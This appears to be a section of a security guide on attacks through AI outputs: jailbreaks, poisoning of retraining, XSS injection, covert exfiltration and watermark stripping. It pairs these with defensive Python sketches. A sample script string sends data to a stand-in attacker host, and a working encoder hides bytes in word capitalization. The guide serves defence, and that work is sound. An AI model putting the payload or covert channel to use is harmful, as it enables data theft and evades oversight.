Output Data
The outputs of AI systems include predictions, classifications, explanations, and generated content. These may be stored for analytics, re-ingested for retraining, or consumed by downstream applications. Improperly managed, outputs can leak sensitive information, amplify bias, or become vectors for injection attacks.
Attack Surfaces
- Sensitive Information Leakage: Models may regurgitate memorized training data or system prompts (a redaction sketch appears after this list).
Ex: An LLM outputs fragments of its training set, accidentally revealing private medical records.
- Toxic or Non-Compliant Content: Adversaries manipulate inputs to elicit harmful or policy-violating outputs.
Ex: A chatbot jailbreak produces extremist propaganda or disallowed financial advice.
- Stored-Output Poisoning: Malicious outputs saved in logs or analytics later poison retraining (see the log-filtering sketch after this list).
Ex: Attackers repeatedly trigger biased responses, which are logged and later re-used in model fine-tuning, amplifying the bias.
- Output Injection: Outputs contain malicious instructions that exploit downstream systems (see the escaping sketch after this list).
Ex: An LLM produces HTML with embedded `<script>` tags. When the output is rendered on a web dashboard, the script executes as an XSS attack.
- Data Exfiltration via Outputs: Attackers encode sensitive information in model outputs to smuggle data out.
Ex: A compromised model embeds API keys inside subtle variations of generated responses (e.g., capital letter patterns); a decoding sketch for this kind of channel appears after this list.
- Watermark/Attribution Removal Attacks: Attackers alter generated outputs to bypass provenance tracking.
Ex: AI-generated text is paraphrased by another model to strip watermarks, then redistributed without attribution.
- Malicious Fine-Tuning via Outputs: Outputs captured and fed into future fine-tuning cycles carry attacker bias.
Ex: Attackers trick an AI assistant into repeatedly outputting toxic completions. These completions are logged, used in reinforcement learning updates, and reinforce the toxicity.
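The leakage item above can be paired with an output-side control: scan generated text for sensitive patterns before it is returned, logged, or re-ingested. The sketch below is a minimal illustration; the regexes and the `redact_output` helper are assumptions made for the example, not a complete PII or secret detector.

```python
import re

# Illustrative patterns only -- a real deployment would use a dedicated
# PII/secret detector; these regexes are assumptions for the sketch.
SENSITIVE_PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "api_key": re.compile(r"\b(?:sk|pk)[-_][A-Za-z0-9]{20,}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
}

def redact_output(text: str) -> tuple[str, list[str]]:
    """Replace matches of sensitive patterns and report which patterns fired."""
    findings = []
    for name, pattern in SENSITIVE_PATTERNS.items():
        if pattern.search(text):
            findings.append(name)
            text = pattern.sub(f"[REDACTED {name.upper()}]", text)
    return text, findings

if __name__ == "__main__":
    raw = "Patient record 123-45-6789 was reviewed; contact jane@example.com."
    cleaned, hits = redact_output(raw)
    print(cleaned)  # sensitive spans replaced with [REDACTED ...] markers
    print(hits)     # ['ssn', 'email']
```

Output-side redaction only catches patterns it knows about, so it complements rather than replaces training-data curation.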
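For the Output Injection item, the core mitigation is to treat model output as untrusted data and escape it before embedding it in HTML. The sketch below uses only Python's standard-library `html.escape`; the `render_model_output` wrapper and the surrounding dashboard are hypothetical.

```python
import html

def render_model_output(model_output: str) -> str:
    """Escape untrusted model output before embedding it in a page.

    html.escape converts <, >, &, and quotes into entities, so output
    like '<script>alert(1)</script>' is displayed as inert text rather
    than executed by the browser.
    """
    return f"<div class='llm-output'>{html.escape(model_output)}</div>"

if __name__ == "__main__":
    malicious = "Here is your report <script>fetch('https://evil.example/steal')</script>"
    print(render_model_output(malicious))
    # The <script> tag appears as &lt;script&gt;... and is not executed.
```

This sketch covers only the HTML-body context; embedding output in attributes, URLs, or JavaScript requires context-specific escaping, and a restrictive Content-Security-Policy is the usual complement.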
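The capital-letter example describes a covert channel: one bit per word, carried by the case of the word's first letter. The sketch below shows both sides of such a channel so the detection problem is concrete; the bit-packing scheme is an assumption made for illustration, not a documented attack encoding.

```python
def encode_capitalization_channel(words: list[str], payload: bytes) -> str:
    """Attacker-side sketch: set each word's first-letter case to carry one bit."""
    bits = [(byte >> shift) & 1 for byte in payload for shift in range(7, -1, -1)]
    styled = []
    for word, bit in zip(words, bits):
        styled.append(word.capitalize() if bit else word.lower())
    return " ".join(styled)

def decode_capitalization_channel(text: str) -> bytes:
    """Recover bytes hidden as one bit per word: capitalized first letter = 1."""
    bits = [1 if w[0].isupper() else 0 for w in text.split() if w[0].isalpha()]
    out = bytearray()
    for i in range(0, len(bits) - 7, 8):
        byte = 0
        for b in bits[i:i + 8]:
            byte = (byte << 1) | b
        out.append(byte)
    return bytes(out)

if __name__ == "__main__":
    cover = ["the", "report", "was", "generated", "for", "review", "by", "staff"]
    stego = encode_capitalization_channel(cover, b"K")   # hide one byte
    print(stego)                                         # "the Report was generated For review By Staff"
    print(decode_capitalization_channel(stego))          # b'K'
```

A monitor that does not know the exact encoding can still flag statistically unusual capitalization or formatting in outputs destined for external channels.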
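Both poisoning items (Stored-Output Poisoning and Malicious Fine-Tuning via Outputs) come down to what is allowed to flow from output logs back into training. A minimal gate is sketched below; the `is_toxic` callback is a placeholder for whatever moderation model the pipeline actually uses, and the near-duplicate cap is an illustrative heuristic, not a complete defense.

```python
from collections import Counter
from collections.abc import Callable, Iterable

def filter_logged_outputs(
    records: Iterable[dict],
    is_toxic: Callable[[str], bool],
    max_near_duplicates: int = 3,
) -> list[dict]:
    """Screen logged model outputs before they re-enter fine-tuning.

    Drops records flagged by the moderation callback and caps how many
    near-identical outputs survive, so an attacker cannot dominate the
    retraining mix by triggering the same biased response repeatedly.
    """
    kept, seen = [], Counter()
    for rec in records:
        text = rec["output"]
        if is_toxic(text):
            continue
        key = " ".join(text.lower().split())[:200]  # crude near-duplicate key
        if seen[key] >= max_near_duplicates:
            continue
        seen[key] += 1
        kept.append(rec)
    return kept

if __name__ == "__main__":
    logs = (
        [{"output": "Benign answer about tax filing."}] * 10
        + [{"output": "Repeated biased claim planted by the attacker."}] * 50
    )
    clean = filter_logged_outputs(logs, is_toxic=lambda t: "attacker" in t)
    print(len(clean))  # 3: planted text dropped, benign duplicates capped
```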